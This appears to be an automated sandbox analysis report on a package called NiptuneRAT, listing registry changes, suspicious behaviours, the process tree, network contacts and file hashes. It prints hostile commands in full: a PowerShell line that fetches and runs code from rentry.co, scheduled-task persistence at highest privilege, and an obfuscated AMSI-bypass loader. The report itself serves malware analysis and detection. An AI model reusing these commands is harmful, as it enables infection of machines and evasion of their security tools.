Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\MRUListEx = 00000000ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3600 wrote to memory of 4896 N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe
PID 3600 wrote to memory of 4896 N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe
PID 3600 wrote to memory of 1560 N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe
PID 3600 wrote to memory of 1560 N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe
PID 2396 wrote to memory of 2556 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\System32\cmd.exe
PID 2396 wrote to memory of 2556 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\System32\cmd.exe
PID 2396 wrote to memory of 1616 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\system32\cmd.exe
PID 2396 wrote to memory of 1616 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\system32\cmd.exe
PID 2396 wrote to memory of 3464 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\system32\cmd.exe
PID 2396 wrote to memory of 3464 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 1256 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2556 wrote to memory of 1256 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3464 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3464 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 4072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1616 wrote to memory of 4072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3304 wrote to memory of 2320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3304 wrote to memory of 2320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 4656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE
PID 2320 wrote to memory of 4656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE
PID 1616 wrote to memory of 3988 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\$77.exe
PID 1616 wrote to memory of 3988 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\$77.exe
PID 4656 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe
PID 4656 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe
PID 4656 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe
PID 4656 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE
PID 4656 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3728 wrote to memory of 620 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 3728 wrote to memory of 676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 3728 wrote to memory of 952 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 388 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3728 wrote to memory of 908 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 676 wrote to memory of 2772 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 3728 wrote to memory of 1088 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1096 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1176 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 676 wrote to memory of 2772 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 1044 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE C:\Windows\System32\schtasks.exe
PID 1044 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\NiptuneRAT-main\" -spe -an -ai#7zMap21379:88:7zEvent29350

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

"C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe

"C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe"

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe

"C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe"

C:\Users\Admin\Desktop\$77NiptuneClient.exe

"C:\Users\Admin\Desktop\$77NiptuneClient.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77" /tr '"C:\Users\Admin\AppData\Roaming\$77.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD3B1.tmp.bat""

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c powershell "irm rentry.co/System-Settings/raw | iex"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$77" /tr '"C:\Users\Admin\AppData\Roaming\$77.exe"'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "irm rentry.co/System-Settings/raw | iex"

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e 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

C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE

"C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE"

C:\Users\Admin\AppData\Roaming\$77.exe

"C:\Users\Admin\AppData\Roaming\$77.exe"

C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe

"C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe"

C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE

"C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FmDvVBkCFmNM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HTNynACjESgbSk,[Parameter(Position=1)][Type]$VUapLZDwuA)$svPFHJRydKw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+[Char](99)+'te'+'d'+''+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'Typ'+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+','+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+'c'+[Char](44)+'Se'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'as'+'s'+''+[Char](44)+''+'A'+''+[Char](117)+'toC'+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$svPFHJRydKw.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'pe'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$HTNynACjESgbSk).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$svPFHJRydKw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+'ySig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+'i'+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+'',$VUapLZDwuA,$HTNynACjESgbSk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $svPFHJRydKw.CreateType();}$rSoNzsfqtPNwC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'in3'+'2'+''+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'at'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'ds');$SEhCBgwbBYuhRD=$rSoNzsfqtPNwC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'li'+[Char](99)+','+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OEZyTvETbOlFWBLYBao=FmDvVBkCFmNM @([String])([IntPtr]);$MmIGJVbffZIQsZzfFyzPEY=FmDvVBkCFmNM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$iZqFqXMPixY=$rSoNzsfqtPNwC.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'Han'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+'d'+'l'+''+'l'+'')));$DIKOvfvTMYXWPH=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$iZqFqXMPixY,[Object]('L'+'o'+'a'+'d'+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+'a'+'r'+'y'+[Char](65)+'')));$DPSAFRPwolNENAHkq=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$iZqFqXMPixY,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$MpOZCuT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DIKOvfvTMYXWPH,$OEZyTvETbOlFWBLYBao).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'ll');$YwEVUxYEuFWntIEUg=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$MpOZCuT,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+'e'+'r')));$yBKdqcFeiQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DPSAFRPwolNENAHkq,$MmIGJVbffZIQsZzfFyzPEY).Invoke($YwEVUxYEuFWntIEUg,[uint32]8,4,[ref]$yBKdqcFeiQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YwEVUxYEuFWntIEUg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DPSAFRPwolNENAHkq,$MmIGJVbffZIQsZzfFyzPEY).Invoke($YwEVUxYEuFWntIEUg,[uint32]8,0x20,[ref]$yBKdqcFeiQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+'WA'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{4f8ebf90-14cd-4bc7-b0be-fa6d0271da55}

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77TCPSVCS" /tr "C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE

C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 42.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 199.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
US 172.67.145.129:80 rentry.co tcp
US 172.67.145.129:443 rentry.co tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 129.145.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
N/A 127.0.0.1:1337 tcp
US 172.67.145.129:443 rentry.co tcp
US 147.185.221.18:36538 tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp

Files

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

MD5 c52733885f1aa485683b9289c4b45519
SHA1 07c3faeb48670485bbefa9e3c35fc24da4f9411a
SHA256 ca9dcd616882b3031c86f962b5cce07187a8a513d183b4f68d897d5687d45bd7
SHA512 5fe1f30b412459cc5d71cd426c2bba9265e6c8f4ade5ddda052fe231ca4e036598c873c40441045abe591b8fcc6e850c2d691b179e44f02f3ce23d0effa4a5c2

